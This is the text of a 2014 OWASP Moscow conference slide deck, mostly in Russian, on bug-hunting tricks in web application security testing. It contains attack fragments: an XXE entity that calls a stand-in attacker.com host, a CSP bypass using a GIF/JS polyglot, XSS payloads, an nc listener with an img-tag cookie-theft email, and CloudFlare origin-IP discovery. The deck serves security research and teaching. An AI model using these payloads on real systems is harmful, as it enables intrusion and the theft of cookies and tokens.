Трюки при анализе защищенности веб-приложений - продвинутая версия

Сергей Белов

Digital Security

OWASP Moscow, 6 Dec 2014

Work/Activity BugHuting Speaker

Hey

2

XXE/SSRF detection via DNS

XXE/SSRF detection via DNS

SSRF:

1) Предложить сайт

<ссылка на сайт>

2) Бот проверяет сайт

3) Вместо внешнего сайта подставляется локальный адрес / заменяется схема (file:///)

XXE/SSRF detection via DNS

XXE:

1) XML

<?xml version="1.0" encoding="ISO-8859-1"?>

2) С сущностью

<!ENTITY xxe SYSTEM «http://attacker.com» >]>

3) Парсер пытается подгрузить сущность с внешнего сайта

XXE/SSRF detection via DNS

Сложности при поиске:

1) Есть или нет?

2) Время запроса

3) Firewall

4) Другие ограничения

XXE/SSRF detection via DNS

DNS leak

DNS server

XXE/SSRF detection via DNS

В ссылке есть домен

->

должен быть resolve домена

XXE/SSRF detection via DNS

Инструкция

1) Свой сервер (VPS) – 12.34.56.78

1) Ставим attacker.com свои NS сервера

NS1: 12.34.56.78; NS2: 12.34.56.78

2) dnschef

3) python dnschef.py -i 0.0.0.0

XXE/SSRF detection via DNS

Реальный пример

Говорят – переходит по ссылкам в чате...

XXE/SSRF detection via DNS

Сценарий 1

1) User 1 -> User 2 http://skype-example.com

2) # cat access.log | grep “skype-example” | wc –l

3) 0

XXE/SSRF detection via DNS

Сценарий 2 – DNS

Поймали :]

CSP bypass – js as image

CSP bypass – js as image

CSP bypass – js as image

Картинка == js файл Gif injector - http://pastebin.com/6yUbfGX5

CSP bypass – js as image

1) Возможность загружать файлы на разрешенные домены в CSP

2) Загрузить картинку<->js и сделать инклуд

<script src=“.../image.gif”></script>

Свежие хромы научились блочить подобное

CloudFlare – real IP detection

CloudFlare – real IP detection

CloudFlare – real IP detection

CloudFlare – real IP detection

CloudFlare Free, Pro and Business plan:

We do not proxy wildcard records

CloudFlare Enterprise:

For CloudFlare Enterprise customers, we do proxy wildcard records

CloudFlare – real IP detection

ping randoOm.victim.com => REAL IP

XSS && urlencode

XSS & urlencode

Web Server ?xss=<script>alert(1)</script>

XSS & urlencode

1) Не все web серверы выполняют urldecode

2) XSS подставляется, но после urlencode

3) XSS не выполняется

4) На помощь приходит... IE!

XSS & urlencode

Только после знака вопроса

XSS & urlencode

А если...

http://domain.com/path/<xss_here>/etc/

XSS & urlencode

http://domain.com/path/<xss>/etc/

IE Only (v11 inc):

header("Location: http://domain.com/path/<xss>/etc/");

XSS & urlencode

SQLmap

SQLmap

SQLmap

-u http://vuln.com/vote.php

--data="id=1&hash=2“

--eval="import hashlib;hash=hashlib.md5(‘123$id456').hexdigest()"

Сложных ситуации - bugbounty

Situation #1 – Same Site Scripting

XXXYYYZZZ.target.com => 127.0.0.1

What’s wrong?

Situation #1 – Same Site Scripting

Situation #1 – Same Site Scripting

External IP – 12.34.56.78 Loopback – 127.0.0.1

Situation #1 – Same Site Scripting

Attacker: 1) nc –lv 10024 2) email to victim@corp.xxx with <img src = http://xxyyzz.target.com:10024 > Victim: 1) Open email and... 2) Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)

Situation #1 – Same Site Scripting

http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml

Situation #1 – Same Site Scripting

38

XXXYYYZZZ.target.com => 10.0.0.22

http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html

Situation #1 – Same Site Scripting

39

https://hackerone.com/reports/1509 - $100

Situation #2 – Self XSS

Situation #2 – Self XSS

XSS only for you – no impact?

Situation #2 – Self XSS

Situation #2 – Self XSS

Requirements: 1)CSRF for logout O_o 2)CSRF for login o_O

Situation #2 – Self XSS

Steps:

1) Save (self)XSS for you 2) Logout victim 3) Login victim w/ your creds 4) Draw window

5) Catch user’s creds!

Situation #2 – Self XSS

Google and self-XSS

Situation #2 – Self XSS

Share account and attack your victim

Situation #3 – evil HTTP referers

Situation #3 - HTTP referer

<a href=“http://external.com”>Go!</a> In request headers: ... Referer: http://yoursite.com/ ... But what about external resources on web page such as images, styles...?

Situation #3 - HTTP referer http://super-website.com/user/passRecovery?t=SECRET

...

<img src=http://comics-are-awesome.com/howto-choose-password.jpg>

... Owner of

comics-are-awesome.com know all _SECRET_ tokens (from referer)!

Situation #3 - HTTP referer

https://hackerone.com/reports/738 - $100

Situation #5 - Content-Security-Policy

Situation #5 - Content-Security-Policy

Situation #5 - Content-Security-Policy

CSP only for some browsers! Is it ok?

Situation #5 - Content-Security-Policy

1) Forks with diff UA 2) Proxy cache 3) Load balancer...

Bug hunter got $100, but...

Situation #5 - Content-Security-Policy

Fail! Why: • ‘Partial support in Internet Explorer 10-11 refers to the

browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header.

• Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages.

• Chrome for iOS fails to render pages without a connect-src 'self' policy.

• Old FF problems (some versions between XX and YY)

Situation #6 - Usernames

Situation #6 - Usernames

http://website.com/username

Situation #6 - Usernames

Okay! Let’s register: http://website.com/robots.txt

http://website.com/sitemap.xml ...

Situations XXX

Situations XXX

• Info disclose via CSS files (full path disclosure while compilation - file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/browser-not-supported\.scss (bug #2221)

• SPF and same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true

Thanks! Questions?

@sergeybelove